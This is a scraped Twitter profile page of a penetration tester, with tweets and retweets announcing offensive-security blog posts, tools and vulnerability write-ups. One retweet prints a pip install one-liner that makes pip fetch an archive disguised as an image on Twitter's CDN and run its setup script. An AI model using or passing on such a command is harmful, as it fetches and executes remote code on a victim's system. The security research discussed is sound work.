V3ded

1.2K posts

V3ded banner
V3ded

V3ded

@V3ded

Penetration Tester, Researcher | Opinions are my own and not the views of my employer | Yes I’m still alive, just taking a break

jackram Katılım Ağustos 2014
120 Takip Edilen1.1K Takipçiler
Sabitlenmiş Tweet
V3ded
V3ded@V3ded·
I’m releasing the second part of my driver development series. Throughout the post I will explore the Windows Filtering Platform (WFP) and its use in handling specifically crafted ICMP network packets. Let me know what you think! v3ded.github.io/redteam/red-te… #redteam #infosec
English
1
46
119
21.2K
V3ded retweetledi
Jack Halon
Jack Halon@jack_halon·
Back in 2018, I released a post on how to break into pentesting, and it's been shared widely in the security community ever since. With so many changes in the field, I've reworked the post to reflect current standards and answer more questions. Enjoy! jhalon.github.io/breaking-into-…
English
2
10
64
4.1K
V3ded
V3ded@V3ded·
New blog post, perhaps 👀?
GIF
English
1
2
23
6.9K
V3ded
V3ded@V3ded·
Dang
V3ded tweet media
Indonesia
1
0
2
347
V3ded
V3ded@V3ded·
Oh maaan. Process creation from kernel mode is such a pain.
English
0
0
5
417
Jack Halon
Jack Halon@jack_halon·
In 2023, I wish for all Red Teams to finally understand that "unhooking APIs" or using "system calls" doesn't equate to an "edr bypass". Kernel Callbacks/Telemetry is a thing, so even if you get around a prevention policy, that doesn't mean you've "blinded the edr".
English
6
23
193
45.3K
V3ded retweetledi
Jack Halon
Jack Halon@jack_halon·
To wrap up 2022, I'm releasing the final part of my 3-part browser exploitation series on Chrome! In this post, we demonstrate the practical use of the concepts we've learned throughout the series by analyzing and exploiting CVE-2018-17463. Enjoy! jhalon.github.io/chrome-browser…
English
8
129
455
55.7K
V3ded
V3ded@V3ded·
New blog coming sometime tomorrow 👀!
English
0
0
4
873
V3ded retweetledi
PabloMK7
PabloMK7@Pablomf6·
Here is ENLBufferPwn (CVE ID pending), a severe vulnerability in many first party 3DS, Wii U and Switch games. It allows remote code execution in a victim console by just having an online game session with an attacker. Vulnerability report: github.com/PabloMK7/ENLBu… 🧵(1/7)
English
31
610
2.4K
590.7K
V3ded retweetledi
mgeeky | Mariusz Banach
mgeeky | Mariusz Banach@mariuszbit·
☢️ Recently we started seeing Threat Actors abusing MSI Windows Installation files for Initial Access & code execution 🔥 I now release Part 1 insights into how MSIs can be abused, PoCs for 🔴 & dissection utility for 🔵 🦠 Let me know what you think! bit.ly/3jc6myt
English
4
116
309
52.1K
V3ded retweetledi
x86matthew
x86matthew@x86matthew·
StealthHook - A method for hooking functions without modifying memory protection. This tool automatically discovers writable global pointers/vtable entries that are nested within the target function, enabling stealthy function hooking and interception. x86matthew.com/view_post?id=s…
x86matthew tweet media
English
7
248
752
0
V3ded retweetledi
Kiwids
Kiwids@mhskai2017·
I wrote a blog post that talks about how we can abuse yet another Chrome Remote Debugging feature to "stalk" end users. posts.specterops.io/stalking-insid…
English
2
45
76
0
V3ded retweetledi
vx-underground
vx-underground@vxunderground·
We've updated our paper collection. The new papers demonstrate the following: - Resolving syscalls in C# - HeavensGate in C# - Thread Stack Spoofing - Inline syscalls in C++ - Inline function calls in C++ - x64 return address spoofing vx-underground.org/windows.html
vx-underground tweet media
English
4
68
293
0
V3ded retweetledi
CCob🏴󠁧󠁢󠁷󠁬󠁳󠁿
CCob🏴󠁧󠁢󠁷󠁬󠁳󠁿@_EthicalChaos_·
Here you go folks, initial release of Volumiser. Dealing with those 100G virtual disc images during red team ops just got easier. Limited testing so far so would love to hear about any problems that pop up. github.com/CCob/Volumiser
English
4
59
129
0
V3ded retweetledi
Kuba Gretzky
Kuba Gretzky@mrgretzky·
Microsoft has just released a patch for ZIP MOTW vulnerability assigned as CVE-2022-41091. I am happy to be able to finally drop my bug analysis write-up! 🔥🪲 Enjoy and happy patching! breakdev.org/zip-motw-bug-a…
English
6
174
425
0
V3ded retweetledi
Yun
Yun@YunZhengHu·
I just published dissect.cobaltstrike v1.0.0. It now supports parsing and decrypting C2 traffic from PCAP files and also adds Beacon Client support which allows you to connect to a Team Server and receive tasks and send back data like a real Beacon. github.com/fox-it/dissect…
English
3
88
210
0
V3ded retweetledi
David Buchanan does not tweet anymore
TIL python's pip will execute a setup .py directly from a ZIP archive from a web URL, with mime sniffing. This allows for a nice lolbin oneliner, with payload hosted on Twitter's CDN (or anywhere else really) pip install "https://pbs"."twimg"."com/media/Ff0iwcvXEAAQDZ3.png"
David Buchanan does not tweet anymore tweet media
English
11
266
1.2K
0